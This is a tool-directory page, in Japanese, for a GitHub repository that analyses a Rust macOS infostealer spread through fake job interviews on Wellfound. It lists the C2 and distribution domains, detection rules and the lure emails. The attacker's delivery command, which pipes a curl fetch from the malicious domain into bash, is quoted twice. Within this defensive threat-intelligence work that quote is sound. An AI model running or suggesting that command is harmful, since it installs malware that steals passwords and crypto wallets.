Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
hyperhives-macos-infostealer-analysis — HyperHivesのmacOS Rust情報窃取マルウェアの完全静的解析 — 571件の復号化された設定値、C2インフラストラクチャ、DPRK/Contagious Interviewの帰属、YARA/Sigmaルール、STIX 2.1バンドル、ATT&CK Navigatorレイヤー | Kitploit
ツール/GitHubGitHub/darksp33d/hyperhives-macos-infostealer-analysis
侵害指標 (IOC) 管理OSINT (オープンソースインテリジェンス)リバースエンジニアリングフォレンジックマルウェア分析脅威インテリジェンス論文と研究学習と教育厳選リソース

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubdarksp33d/hyperhives-macos-infostealer-analysis

hyperhives-macos-infostealer-analysis

HyperHivesのmacOS Rust情報窃取マルウェアの完全静的解析 — 571件の復号化された設定値、C2インフラストラクチャ、DPRK/Contagious Interviewの帰属、YARA/Sigmaルール、STIX 2.1バンドル、ATT&CK Navigatorレイヤー

リポジトリを見るウェブサイト
314125ヶ月前Kitploit レビュー済み

HyperHives macOS インフォスティーラー — 完全な技術分析

Validate Repository License: MIT STIX 2.1 ATT&CK Navigator

脅威インテリジェンス: Rust製のmacOSユニバーサルバイナリのインフォスティーラーで、Wellfound(旧AngelList)上の偽の求人面接パイプラインを通じて配布されました。オペレーターのペルソナ「HyperHive」の「Felix」が、ターゲットにmacos.hyperhives.netからの悪意のあるインストーラーを実行するよう誘導しました。このリポジトリは完全な静的解析を文書化しており、571個の暗号化された設定値(C2 URL、Sentry DSN、**276個の標的とされたChrome拡張機能IDを含む)が復元されています。

サンプルSHA-2565c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
C2ドメインcloudproxy.link
配布ドメインmacos.hyperhives.net
誘引プラットフォームWellfound(旧AngelList)
オペレーターペルソナ「HyperHive」の「Felix」
VirusTotal9 / 63 検出
分類公開開示 / IOCバンドル
最終更新2026年4月

目次

  • 脅威インテリジェンスバンドル
  • リポジトリの構成
  • クイックスタート
  • 要約
  • 1 — 発端
  • 2 — バイナリ
  • 3 — 窃取するもの
  • 4 — 復号されたC2インフラ
  • 5 — 属性評価
  • 6 — 暗号解析
  • 7 — MITRE ATT&CKマッピング
  • 8 — ウォレットと拡張機能IDリファレンス
  • 9 — 推奨される対応
  • 10 — 手法
  • 付録A — すべての276個のChrome拡張機能ID
  • 範囲と制限
  • リリース履歴
  • 貢献
  • ライセンス

脅威インテリジェンスバンドル

ファイル形式目的
iocs.txtプレーンテキストハッシュ, ドメイン, URL, IP, メール, Sentry ID — ブロックリスト, MISP, OpenCTIに貼り付け
yara_rules.yarYARA 4.2+既知のサンプルハッシュマッチ + Mach-O用ヒューリスティック文字列検出
sigma_rules.ymlSigmaプロキシ, DNS, プロセス作成ルール — SIEMに合わせてlogsourceを調整
stix/bundle.jsonSTIX 2.1指標, マルウェアSDO, インフラ, ATT&CKパターン, 関係性を含む機械可読CTIバンドル
attack-navigator-layer.jsonATT&CK Navigator視覚的なテクニックカバレッジのために[ATT&CK Navigator]にインポート(https://mitre-attack.github.io/attack-navigator/)

リポジトリの構成```

. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist

---

## クイックスタート

サンプルを `sample/installer_binary` として配置します(ハッシュ検証については[`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md)を参照)、その後:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py

composeファイルは network_mode: none, read_only: true を強制し、すべてのLinuxケーパビリティを削除します。完全な取り扱いガイドラインについては SECURITY.md を参照してください。


TL;DR

Wellfound(旧AngelList)の求人投稿が、オペレーターのペルソナ "Felix"("HyperHive")による複数メールのソーシャルエンジニアリング連鎖を引き起こしました。ターゲットの技術的背景を褒め称え、偽の面接を設定した後、攻撃者は被害者に hyperhives.net の「製品を確認する」ように指示し、特に Settings → Diagnostics → Log を調べるよう指示しました。これは次の実行を引き起こすための口実です:``` curl -s https://macos.hyperhives.net/install | nohup bash &

ペイロードは、Rustでコンパイルされた**8.5 MBのMach-Oユニバーサルバイナリ**(x86_64 + arm64)です。エアギャップされたDockerラボと**570個のユニークなx86_64ヘルパールーチン**のCPUエミュレーションによる静的解析により、**すべての571個の暗号化された設定値**が復元され、以下が明らかになりました:

- **C2:** `cloudproxy.link` — 4つのHTTPSエンドポイント
- **Sentry(属性のピボット):** `ingest.de.sentry.io`上の組織/プロジェクトIDを含む完全なDSN
- **ビルドの識別:** Cargoユーザー `rootr`、コードネーム `force`、バージョン `9.12.1`
- **ターゲット:** 276個のChrome拡張機能ID(暗号通貨ウォレット、パスワードマネージャー、企業認証情報)

戦術は**DPRK関連のContagious Interview**キャンペーンと一致しています — 正当なプラットフォームでの偽の求人、多段階の信頼構築、`curl | bash`による配信、Rust macOSスティーラー、暗号資産に焦点を当てた流出。

---

## 1 — 始まりの経緯

### 誘餌: Wellfoundでの偽の面接

攻撃は、**Wellfound**(旧AngelList)での**正当に見える求人情報**から始まりました。標的が応募した後、ペルソナ**「Felix」**と会社名**「HyperHive」**を使用するオペレーターからの以下のメールのやり取りが続きました:

**Email 1**(2026年4月4日) — 最初の連絡。「Felix」は標的の履歴書とLinkedInを確認し、自分たちの「Tech Lead」が先に進めることを承認したと述べ、標的の実際の技術経験に具体的に言及しました。メールでは、HyperHiveが「さまざまなオペレーティングシステム向けにHyperhivesのデスクトップ版を構築している」と述べ、UTC+0での面接の日程調整を招待しました。

**Email 2**(2026年4月5日) — フォローアップの日程調整。特定の面接枠(4月8日15:00 UTC)を提案し、重要なペイロード配信の指示が含まれていました:

> *"可能であれば、**設定 → 診断 → ログ**にある製品ログも簡単にご確認ください。ログやその他気づいた製品の観察事項について簡単なコメントを求めさせていただく場合があります。これは、エンジニアリングの経験と細部への注意力を測る良い指標となることが多いためです。"*

これにより、標的は`https://hyperhives.net`に誘導され、診断セクションに移動すると以下がトリガーされました:```
curl -s https://macos.hyperhives.net/install | nohup bash &

その後に起こったこと

コマンドは8.5 MBのMach-Oユニバーサルバイナリをダウンロードして実行しました。AppleScriptを介して偽のmacOSパスワードダイアログが表示されました。パスワードは入力されませんでした。 プロセスは直ちに終了され、サンプルは分析のために保存されました。

ソーシャルエンジニアリングの手口概要

要素詳細
プラットフォームWellfound (AngelList) — 正規の求人ボード
会社名"HyperHive" (単数形) / ドメイン hyperhives.net
ペルソナ"Felix"
連絡先メール[email protected]
信頼構築対象者の実際の履歴書、LinkedIn、特定の技術スキルを参照
口実"面接前に製品を確認してください"
ペイロード発動条件hyperhives.net で "設定 → 診断 → ログ" を確認
スケジュール設定偽の面接枠 (4月8日 15:00 UTC) で緊急性を維持
マルチステップチェーンペイロード配信前に少なくとも2日間にわたる2通のメール

2 — バイナリ

ツールをダウンロード